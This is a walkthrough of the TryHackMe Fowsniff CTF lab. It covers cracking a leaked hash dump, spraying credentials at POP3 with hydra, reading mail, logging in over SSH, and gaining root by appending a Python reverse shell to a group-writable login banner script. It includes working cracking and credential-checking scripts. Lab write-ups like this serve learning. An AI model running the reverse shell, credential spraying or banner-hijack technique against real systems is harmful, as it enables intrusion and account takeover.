# 7. TryHackMe Series writeups: Fowsniff CTF
Hello guys, I'm back with another walkthrough, this time tackling the Fowsniff CTF lab from TryHackMe.
The room describes itself as: "Hack this machine and get the flag. There are lots of hints along the way and it is perfect for beginners!"
So let's start!
As usual, the first step is to enumerate the box. We use nmap to find the open ports and identify the services behind them (-sV for version detection, -sC for the default scripts).
Command: nmap -sV -sC <IP>
The scan shows four open ports and the services on them: SSH, HTTP, POP3 and IMAP. Mail services next to a web server are worth remembering, because whatever credentials we find later will have somewhere to be tried.
Let's start with the HTTP site.
The home page carries a notice: "Fowsniff's internal system suffered a data breach that resulted in the exposure of employee usernames and passwords..."
So there has been a breach, and the same notice tells us the attacker also hijacked the company's Twitter account. Let's look at the Twitter profile of @fowsniffcorp.
The profile contains a Pastebin link to a backup of the leaked password dump.
Looking at the dump, the passwords are not in plaintext: each user is listed with a hash of their password.
Let's try to crack the hashes. Unsalted hashes of short, common passwords fall quickly to a dictionary attack or an online lookup, and identical hashes for two users would immediately reveal password reuse.
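To make the cracking step concrete, here is an added example (not code from the original walkthrough) of the dictionary attack a practitioner would run against an unsalted dump. The dump lines, user names and wordlist below are constructed for the example; the hashes are MD5 digests of well-known weak passwords plus one uncrackable filler, and it is an assumption that the room's dump uses unsalted hashes of this kind, which the code infers from the hex length.

```python
import hashlib

# Hex digest length -> unsalted algorithms worth trying for that length.
ALGORITHMS_BY_HEX_LENGTH = {32: ("md5",), 40: ("sha1",), 64: ("sha256",)}

# Constructed sample dump: made-up users, MD5 of three well-known weak
# passwords (alice and dave share one), and a filler hash no word produces.
# These are NOT the real Fowsniff accounts or hashes.
SAMPLE_DUMP = """\
-- password backup (constructed sample) --
alice:5f4dcc3b5aa765d61d8327deb882cf99
bob:0d107d09f5bbe40cade3de5c71e9e9b7
carol:E10ADC3949BA59ABBE56E057F20F883E
dave:5f4dcc3b5aa765d61d8327deb882cf99
erin:00000000000000000000000000000000
"""
SAMPLE_WORDLIST = ["qwerty", "password", "letmein", "123456", "dragon"]


def parse_dump(text):
    """Parse 'user:hash' lines as they appear in a typical breach dump.

    Lines without a colon (banners, blank lines) are skipped and digests are
    lower-cased so they compare equal however they were pasted.
    """
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, _, digest = line.partition(":")
        creds[user.strip()] = digest.strip().lower()
    return creds


def crack(digests, wordlist):
    """Dictionary attack on unsalted hashes: {user: hash} -> {user: password}.

    Every candidate word is hashed once per algorithm and looked up in a
    reverse index of the wanted digests, so the cost grows with the wordlist,
    not with wordlist * users. Because the hashes are unsalted, users sharing
    a password are recovered together from a single digest.
    """
    wanted = {}
    for user, digest in digests.items():
        wanted.setdefault(digest, []).append(user)

    algos = set()
    for digest in wanted:
        algos.update(ALGORITHMS_BY_HEX_LENGTH.get(len(digest), ()))

    cracked = {}
    for word in wordlist:
        for algo in algos:
            h = hashlib.new(algo, word.encode()).hexdigest()
            for user in wanted.get(h, ()):
                cracked[user] = word
        if len(cracked) == len(digests):
            break  # everything recovered, no need to finish the wordlist
    return cracked


if __name__ == "__main__":
    found = crack(parse_dump(SAMPLE_DUMP), SAMPLE_WORDLIST)
    for user, password in sorted(found.items()):
        print(f"{user}:{password}")
```

With a real dump, point parse_dump at the pasted text and swap SAMPLE_WORDLIST for a file such as rockyou; anything left uncracked is a candidate for a larger list or a rule-based attack rather than a reason to stop.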
Working out where to use the recovered passwords was not obvious at first, but the room's question hints at POP3.
We now need to check which of these credentials still work. With only nine accounts this could be done by hand, but let's use a tool, since we would need one anyway if there were hundreds of credentials.
Note: user.txt and pass.txt contain the usernames and the cracked passwords from the dump. The room suggests Metasploit, which can also brute-force the login, but hydra is much quicker. Keep in mind that -L together with -P tries every user with every password; that catches passwords reused between accounts, but it also generates far more login attempts (and mail-server log entries) than testing only the dump's own user:password pairs.
Command: hydra -L user.txt -P pass.txt pop3://<IP>
Hydra reports one working username and password for POP3.
Let's log into POP3 by hand with telnet, authenticating with USER <name> followed by PASS <password>:
Command: telnet <IP> 110
After authenticating, the LIST command shows two messages. Let's see what they contain.
To read a message, use RETR followed by its number:
Command: RETR 1
Command: RETR 2
The first mail states a temporary SSH password in plain words. The second mail is from baksteen and holds no other clue, so, hoping that baksteen never changed the temporary password, let's try to log in as that user.
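The hydra spray and the telnet session above can be reproduced with Python's standard poplib. This is an added example, not part of the original write-up: it tests each user:password pair exactly once, then lists and retrieves the messages of a valid account, and it talks to a tiny in-process fake POP3 server so that it runs offline. The accounts, mails and "temporary password" in it are constructed for the demo, not those on the Fowsniff box.

```python
import poplib
import socketserver
import threading

# Constructed demo data: made-up accounts and mails, not the box's real ones.
DEMO_ACCOUNTS = {"alice": "Summer2018", "bob": "letmein"}
DEMO_MAILBOX = [
    "From: it@example.test\r\nTo: bob@example.test\r\nSubject: temp password\r\n"
    "\r\nYour temporary SSH password is ChangeMe123 (constructed). Change it!\r\n",
    "From: alice@example.test\r\nTo: bob@example.test\r\nSubject: lunch\r\n\r\nPizza?\r\n",
]


class FakePop3Handler(socketserver.StreamRequestHandler):
    """Just enough POP3 for poplib: USER, PASS, LIST, RETR, QUIT."""

    def send(self, text):
        self.wfile.write(text.encode() + b"\r\n")

    def handle(self):
        self.send("+OK demo POP3 ready")
        user, authed = None, False
        while True:
            raw = self.rfile.readline()
            if not raw:  # client went away
                return
            cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user, authed = arg, False
                self.send("+OK")
            elif cmd == "PASS":
                authed = DEMO_ACCOUNTS.get(user) == arg
                self.send("+OK logged in" if authed else "-ERR [AUTH] Authentication failed")
            elif cmd == "LIST" and authed:
                self.send(f"+OK {len(DEMO_MAILBOX)} messages")
                for i, msg in enumerate(DEMO_MAILBOX, 1):
                    self.send(f"{i} {len(msg)}")
                self.send(".")
            elif cmd == "RETR" and authed and arg.isdigit() and 1 <= int(arg) <= len(DEMO_MAILBOX):
                self.send("+OK")
                for line in DEMO_MAILBOX[int(arg) - 1].splitlines():
                    self.send(line)
                self.send(".")
            elif cmd == "QUIT":
                self.send("+OK bye")
                return
            else:
                self.send("-ERR unsupported command or not authenticated")


def check_pop3_pairs(host, port, pairs, timeout=5.0):
    """Try each (user, password) pair once; return the pairs the server accepts.

    The dump already pairs every user with a hash, so testing the pairs is
    enough; a full user x password cross product only adds noise.
    """
    valid = []
    for user, password in pairs:
        conn = poplib.POP3(host, port, timeout=timeout)
        try:
            conn.user(user)
            conn.pass_(password)  # raises error_proto on a -ERR reply
            valid.append((user, password))
            conn.quit()
        except poplib.error_proto:
            conn.close()
    return valid


def fetch_mailbox(host, port, user, password, timeout=5.0):
    """Log in, LIST the mailbox and RETR every message as a decoded string."""
    conn = poplib.POP3(host, port, timeout=timeout)
    conn.user(user)
    conn.pass_(password)
    _, listing, _ = conn.list()
    messages = []
    for entry in listing:  # each entry looks like b"1 123": number and size
        number = int(entry.split()[0])
        _, lines, _ = conn.retr(number)
        messages.append(b"\r\n".join(lines).decode(errors="replace"))
    conn.quit()
    return messages


def run_demo():
    """Start the fake server on a free local port and run both steps against it."""
    server = socketserver.TCPServer(("127.0.0.1", 0), FakePop3Handler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        # Constructed candidate pairs, as if taken from the cracked dump.
        pairs = [("alice", "wrong"), ("alice", "Summer2018"), ("bob", "letmein"), ("carol", "qwerty")]
        valid = check_pop3_pairs("127.0.0.1", port, pairs)
        mails = fetch_mailbox("127.0.0.1", port, *valid[-1]) if valid else []
        return valid, mails
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    valid, mails = run_demo()
    print("valid credentials:", valid)
    for i, mail in enumerate(mails, 1):
        print(f"--- message {i} ---\n{mail}")
```

Against the real box, drop the fake server and call check_pop3_pairs and fetch_mailbox with the target's address and port 110; poplib.POP3_SSL does the same over port 995 where the server offers it.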
Command: ssh baksteen@<IP>
Note: had the mail not named a user, the temporary password could have been tried against the whole user list over SSH with hydra to find the account that still uses it.
We are in over SSH. Nothing stood out at first, but the room asks: "Once connected, what groups does this user belong to? Are there any interesting files that can be run by that group?"
Let's list the files owned by one of baksteen's groups, here users:
Command: find / -type f -group users 2>/dev/null
/opt/cube/cube.sh stands out: it prints the banner we see when connecting over SSH, and the group-write bit lets our group modify it. Group ownership alone would not be enough, so check the permissions of anything interesting before assuming it is editable. A login banner is produced before our own shell starts, so the script is run by the login process rather than by us, which is exactly what makes a writable copy dangerous.
Let's append a reverse shell to cube.sh and start a netcat listener on our machine.
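The find command above lists every file owned by the users group, but what matters for the next step is whether the group can write to the file. The following added Python example (not from the original walkthrough) walks a tree and reports only regular files whose group is one of the caller's groups and whose group-write bit is set; the temporary directory and the cube.sh it creates are constructed for the demo and have nothing to do with the box's /opt/cube/cube.sh.

```python
import os
import stat
import tempfile


def writable_by_groups(root, gids=None):
    """Return regular files under root that a member of gids can actually edit.

    A file qualifies when its group is one of gids AND its group-write bit is
    set, which is stricter than 'find -group users'. gids defaults to the
    caller's primary and supplementary groups. Unreadable directories and
    vanished files are skipped, mirroring find's 2>/dev/null.
    """
    if gids is None:
        gids = {os.getgid(), *os.getgroups()}
    gids = set(gids)
    hits = []
    for dirpath, _, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the link itself, not its target
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_gid in gids and st.st_mode & stat.S_IWGRP:
                hits.append(path)
    return sorted(hits)


def demo():
    """Constructed tree: one group-writable script (0664) and one that is not (0644)."""
    base = tempfile.mkdtemp()
    editable = os.path.join(base, "cube.sh")   # constructed, not the box's file
    readonly = os.path.join(base, "notes.txt")
    for path, mode in ((editable, 0o664), (readonly, 0o644)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho banner\n")
        os.chmod(path, mode)
    gid = os.stat(editable).st_gid  # whatever group the temp dir hands out
    return writable_by_groups(base, gids=[gid]), editable, readonly


if __name__ == "__main__":
    hits, _, _ = demo()
    print("\n".join(hits))
```

On a target, call writable_by_groups("/") with no gids argument to get the equivalent of the find command restricted to files the current user can really write to.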
```sh
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
Don't execute the edited script yourself: that only gives us another shell as baksteen over netcat, the user we already have. The point is to let the login process run it for us.
Now it's time to escalate our privileges.
Log in once more over SSH with baksteen's credentials. The banner script is executed as part of the login with root privileges, so the reverse shell connects back to our listener as root.
And there we found the flag and completed the lab successfully!
Thanks for sticking around.
Visit my other walkthroughs, and thank you for taking the time to read this one.
If you found it useful, please share it with others who have similar interests! Feedback is always appreciated!